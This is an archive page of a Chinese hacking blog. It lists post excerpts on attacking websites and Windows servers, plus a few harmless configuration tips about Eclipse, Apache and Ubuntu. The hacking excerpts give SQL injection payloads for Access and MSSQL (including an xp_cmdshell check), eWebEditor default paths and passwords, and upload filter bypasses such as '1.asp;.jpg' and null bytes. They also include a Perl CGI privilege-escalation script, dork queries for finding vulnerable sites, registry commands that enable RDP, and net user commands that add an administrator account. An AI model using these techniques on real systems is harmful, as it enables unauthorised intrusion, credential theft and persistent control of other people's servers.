08 2013 档案
摘要:windows 2003 下,安装ActivePerl-5.16.2.1602-MSWin32-x86-296513IIS 添加CGI支持。并在对应网站配置下面,添加CGI后缀或PL后缀 与 对应的perlis.dll此时,网站支持HTTP访问CGI 或者 .pl脚本。可以用来提取,.CGI .PL权限比较大,大于ASPX。首先上传CGI 提权执行脚本:#!/usr/bin/perlbinmode(STDOUT);syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);$_ = $ENV{QUERY_STRING};s
阅读全文
摘要:ACCESS的注入,基本是死的。思路很简单,基本都可以工具解决。上代码:1、判断有无注入点' and 1=1 and 1=22、猜表一般的表的名称无非是admin adminuser user pass password and 0(select count(*) from *) and exists (select * from admin)and 0(select count(*) from admin)3、爆破帐号数目 如果遇到00)--and 1=(select count(*) from admin where len(username)>0)and 1=(select
阅读全文
摘要:ewebeditor默认数据库路径:[PATH]/db/ewebeditor.mdb [PATH]/db/db.mdb [PATH]/db/%23ewebeditor.mdb默认密码:admin/admin888 或 admin/admin 进入后台,也可尝试 admin/123456/admin888系统默认:ewebeditor.asp?id=content1&style=standard样式调用 eWebEditor.asp?id=45&style=standard1查看版本:edit/dialog/about.htmlewebeditor/d...
阅读全文
摘要:抓包修改数据为:IIS忽略冒号后面格式 cs.asp:.jpg火狐FIREBUG修改本地JSupfile/upfile_other.asp upfile_photo.asp upfile_flash.aspasa cer asaspp隐藏表单,hidden修改数据,file00 1.asp;.jpg十六进制00: 1.asp双文件上传文件名大小写突破,对于LINUX等非WINDOWS系统asp空格asp./xx.jpg%00.phpcecerr aasasaContent-Type: image/gif (原为 Content-Type: text/plain)上传一个shtml文件, 内容为
阅读全文
摘要:另类登录注入形式:经常有一类验证(ASP,PHP,JSP均存在),先判断user是否存在,ASP为例子:"select password from admin where user_name='"&request("user_name")&"'";然后再判断密码MD5与之对比。猜解思路可以构造,user_name: xxx' and password>'a 如果password第一位大于a,则继续user_name: xxx' and password>'b.
阅读全文
摘要:通用:Site:xxx. warningSite:xxx. “fatal error”test.phpphpinfo.php1.phpDZ曝路径:/source/function/function_connect.php/source/plugin/myrepeats/table/table_myrepeats.phpucenter\control \admin\db.phpuc_server\control \admin\db.phpWP 爆路径:wp-admin/includes/admin.phpwp-admin/includes/file.phpwp-content/themes/..
阅读全文
摘要:...8./Database/#newasp.mdb关键词:NewAsp SiteManageSystem Version9.用挖掘机 关键字:Powered by WEBBOY页面:/upfile.asp10.baidu中搜索关键字Ver5.0 Build 0519(存在上传漏洞)11.Upfile_Article.asp bbs/upfile.asp 输入关键字:powered by mypower ,12.inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站13.现在GOOGLE搜索关键字 intitle:网站小助手 i...
阅读全文
摘要:端口0服务Reserved说明通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 端口1 服务tcpmux 说明这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNE
阅读全文
摘要:伪静态,主要是为了隐藏传递的参数名,伪静态只是一种URL重写的手段,既然能接受参数输入,所以并不能防止注入。目前来看,防止注入的最有效的方法就是使用LINQ。常规的伪静态页面如下:http://www.2cto.com /play/Diablo.html, 在看到之前先要确定这个页面是静态还是伪静态,鉴别方法很多。 例如关联的动态页面是game.php ,那么当用户访问后程序会自动转换成类似http://www.XXX.com/game.php?action=play& name=Diablo 的形式,当然这部分是PHP执行的所以在访问时看不到。假如name=Diablo这个参
阅读全文
摘要:安装完apache2后,a2enmod rewrite //启用.htaccess规则a2enmod proxya2enmod proxy_http //启用反向代理支持 [P]配置OK,就可以在.htaccess中配置复杂反向代理规则了:例如:RewriteEngine OnRewriteBase /RewriteCond %{REQUEST_FILENAME} !-fRewriteCond %{REQUEST_FILENAME} !-dRewriteRule ^(.*)$ http://www.xxx.com/$1 [P] 全站反向代理
阅读全文
摘要:第一步:进入设置窗口 windows -> preferences第二步:进入修改字体的选项卡。 General -> Appearance -> Colors and Fonts第三步:选中"Basic"子选项里的"Text Font"。第四步:点右边那个"Edit"按钮,修改字体。
阅读全文
摘要:1、Project > Properties > Resource2、Window > Preferences > General > Workspace3、Window > Preferences > Web > HTML Files4、Window > Preferences > Web > CSS Files5、Window > Preferences > PHP > Debug
阅读全文
摘要:注入查阅1、返回的是连接的数据库名and db_name()>02、作用是获取连接用户名and user>03、将数据库备份到Web目录下面;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';--4、显示SQL系统版本and 1=(select @@VERSION) 或and 1=convert(int,@@version)--5、判断xp_cmdshell扩展存储过程是否存在and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = &#
阅读全文
摘要:打开CMD窗口net stop mysql //停止MYSQLmysqld -nt --skip-grant-tables //跳过密码检测。 mysqld.exe在Bin目录下然后另外新打开一个cmd窗口输入mysql 直接回车可以以root权限进入mysqluse mysqlupdate user set password=password("新密码") where user="root";flush privileges;如果无错误提示,密码即可更改成功。
阅读全文
摘要:3389常用命令:1.查询终端端口REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber2.查看终端一技巧其实 可以首先可以 使用命令 tasklist /svc 查看, 找到服务名称为 Terms service 所对应的 ID, 在使用命令 netstat -ano3.开启3389终端REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server
阅读全文
摘要:再老,也得温习下:net use \\127.0.0.1\ipc$ '123123' /user:'administrator' //ipc连接net use \\127.0.0.1\ipc$ /delete //退出ipcnet use z:\\127.0.0.1\C$ //Z盘 映射指定IP的C盘net user admin 123 /add && net localgroup administrators admin /add //DOS新添加管理员net user guest /active:yes && net user
阅读全文
摘要:mysql:内置函数常用函数:left(), mid(), ord(), length(),benchmark(),load_file(), outfile(),concat(),系统重要信息:system_user(), user(), current_user, session_user(), database(), version(),ASCII码:select char(97,100,109,105,110) 回显:admin16进制:select0x61646D696E 回显:admin注释方法: /* --使用 /**/ 或者 + 代替空格@@datadir 读取数据库路径@@b.
阅读全文
摘要:上次这个问题 : UBUNTU 无法解析域名 解决方法解决后,每次重启电脑都需要重新配置/etc/resolv.conf.这次添加IP的时候留心发现,在/etc/network/interfaces 下面添加dns-nameservers的话,就可以解决问题。重启依旧可以!关于如何添加IP 参考:如何给Ubuntu网站绑定多个IP,怎么给Ubuntu服务器设置多IP多个不同IP段的 /etc/network/interfaces 配置文件的范例如下:# The loopback network interfaceauto loiface lo inet loopback# The primar
阅读全文